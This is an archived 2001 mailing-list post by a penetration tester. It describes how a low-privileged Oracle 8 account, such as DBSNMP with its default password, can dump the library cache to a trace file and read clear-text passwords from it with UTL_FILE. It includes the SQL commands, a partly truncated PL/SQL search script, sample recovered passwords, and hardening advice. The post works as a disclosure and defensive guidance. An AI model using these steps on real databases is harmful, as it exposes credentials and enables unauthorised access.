Oracle 8 - revealing clear text passwords from the SGA

From: Pete Finnigan (peteat_private)
Date: Wed Aug 29 2001 - 10:08:05 PDT

  • Next message: Christopher Ray: "RE: Security Audit"

    Hi all
    I have been doing an audit on Oracle databases at a customer site and
    come across a situation where it could be possible to extract Oracle
    Passwords in clear text from the SGA (System Global Area) given the
    circumstances described below. 
    Has anyone else seen this, is it a common mistake made in setting up
    oracle databases. I have seen it at a previous site also.
    The following situation is needed:-
    1 - An Oracle user that has been granted the Oracle role CONNECT. This
    role has the system privilege "ALTER SESSION". Or a user that has been
    granted "ALTER SESSION" directly.
    2 - An Oracle user that has been granted select on the SYS owned view
    V$PARAMETER. In fact "SELECT" has to have been granted on the underlying
    view V_$PARAMETER, as V$PARAMETER is actually a synonym. The ROLE
    SNMPAGENT has this privilege.
    3 - Access is needed to the built in package UTL_FILE. This package
    generally has public access granted as default. This will only not be
    the case if a DBA has revoked this privilege.
    4 - The directory parameter from the initialisation file "utl_file_dir"
    needs to have been set to the same directory as the trace file location
    5 - Someone needs to have added a user using "CREATE USER..." or "GRANT
    CONNECT..." or altered a users password using "ALTER USER..."
    That seems like a large set of requirements, BUT, its not too difficult
    to how we could get them and see passwords in clear text.
    I cannot show the exact results from site, so here is an equivalent
    example. The case on the customers site was on Oracle 8.1.6 and 8.0.5,
    this example is on windows and oracle 8.1.5:-
    The default user DBSNMP which has the password DBSNMP on installation is
    just what we are looking for. This user is installed by default and from
    experience this default password is usually not changed. This user has
    the roles CONNECT and SNMPAGENT. So we can "alter session" and select
    from v$parameter. That only leaves the "utl_file_dir". This what we need
    to do:-
    1 - start sqlplus as dbnsmp as follows
    pxf:sputnik>sqlplus dbsnmp/dbsnmp
    2 - Next we need to find out if the utl_file_dir is set to the same
    location as trace files are written, "user_dump_dest". Do the following
    SQL> select name,value
      2  from v$parameter
      3  where name in ('user_dump_dest','utl_file_dir');
    This is only an example, but the two production databases i have seen
    had the utl_file_dir set in one case just to the trace file directory
    and in the other case to "*". The above shows that the trace directory
    is indeed the same as the utl_file_dir. This parameter can also be set
    to "*" which means the UTL_FILE built in package can read and write
    files to any OS directory as long as the owner of the Oracle software
    has permission on the directory. This would include the trace directory.
    Next we need to dump the library cache to a trace file. This will
    include any SQL that is still in the SGA, including passwords in clear
    text. We also need to know the pid of the process we are running so we
    can deduce the name of the trace file. 
    To select the PID from the database we need to have the privilege SELECT
    granted on v_$PROCESS the underlying view pointed at by V$PROCESS and
    also on V$SESSION and the underlying view V_$SESSION. Again this
    permission is granted to the ROLE SNMPAGENT granted to the user DBSNMP.
    For another user use "ps" to get the OS pid of the shadow process.
    This is as follows:-
    SQL> select p.spid,s.username usrname
      2  from v$process p, v$session s
      3  where p.addr=s.paddr
      4  and s.username=user;
    SPID      USRNAME                                                                                   
    --------- ------------------------------                                                            
    324       DBSNMP                                                                                    
    The PID is 324, next dump the library cache to trace a trace file in the
    SQL> alter session set events 'immediate trace name library_cache level
    Session altered.
    This command creates a trace file in the directory pointed at by the
    parameter "user_dump_dest". This directory is not visible to users who
    are not the oracle software owner or in the OSDBA group usually the unix
    group "dba". So DBSNMP cannot even see the contents of this directory to
    see the file name or even to read the file it has just created. But we
    know the format of the file name on windows its ORA[XXXXX].trc where
    XXXXX is the PID found above, ie the file we need is ORA00324.trc in
    On Unix the file name is ora_[pid].trc and if there are multiple
    instances its ora_[SID]_[PID].trc.
    Next we need to read the trace file. This is achieved with the public
    utility UTL_FILE. This package as stated allows us to read and write
    files pointed at by utl_file_dir. 
    A search for passwords can be done as follows:-
    save this to a file say read_trc.sql
    -- read_trc.sql
            fptr    utl_file.file_type;
            buff    varchar2(2048);
            line_no number(10):=0;
            loc_no  integer;
                    loc_no:=instr(upper(buff),upper('identified by'));
                    if loc_no>0 then
                            dbms_output.put_line(line_no||' '||buff);
                    end if;
            end loop;
            when no_data_found then
                    dbms_output.put_line('Number of lines parsed =
            when value_error then
                    dbms_output.put_line('value error');
                    raise_application_error(-20100,'file error');   
            when utl_file.invalid_path  then
                    dbms_output.put_line('invalid path');
                    raise_application_error(-20100,'file error');   
            when utl_file.invalid_mode  then
                    raise_application_error(-20100,'file error');   
            when utl_file.invalid_filehandle  then
                    raise_application_error(-20100,'file error');   
            when utl_file.invalid_operation  then
                    raise_application_error(-20100,'file error');   
            when utl_file.read_error  then
                    raise_application_error(-20100,'file error');   
            when utl_file.write_error  then
                    raise_application_error(-20100,'file error');   
            when utl_file.internal_error  then
                    raise_application_error(-20100,'file error');   
            when others then
                    raise_application_error(-20100,'file error');   
    running gives:-
    SQL> set serveroutput on size 1000000
    SQL> @read_trc
    909   name=alter user system identified by manager                                                  
    2677   name=grant connect, resource,dba to ddf identified by ddf                                    
    Number of lines parsed = 5992                                                                       
    PL/SQL procedure successfully completed.
    This shows that someone has changed the password for the user SYSTEM and
    we can see its been set to MANAGER and a user DDF has been created with
    a password DDF, this user is also a DBA.
    The example is also noddy, the whole process should be written entirely
    in PL/SQL so it can be just run as a test. 
    I will write this as one piece of code do do the whole check and make it
    available if anyone is interested.
    In my opinion this is not a vulnerability as Oracle do state in their
    documentation not to set the location for the package UTL_FILE
    (utl_file_dir) to any location you would not want normal users to read
    or write. Also the default passwords should be changed.
    So in summary
    1 - change the default passwords, ie DBSNMP is dangerous
    2 - don't set utl_file_dir = user_dump_dest or to "*" or to "."
    3 - restrict the package UTL_FILE from public and to only those users
    that actually need it.
    Pete Finnigan
    IT Security Consultant
    PenTest Limited
    Office  01565 830 990
    Fax     01565 830 889
    Mobile  07974 087 885
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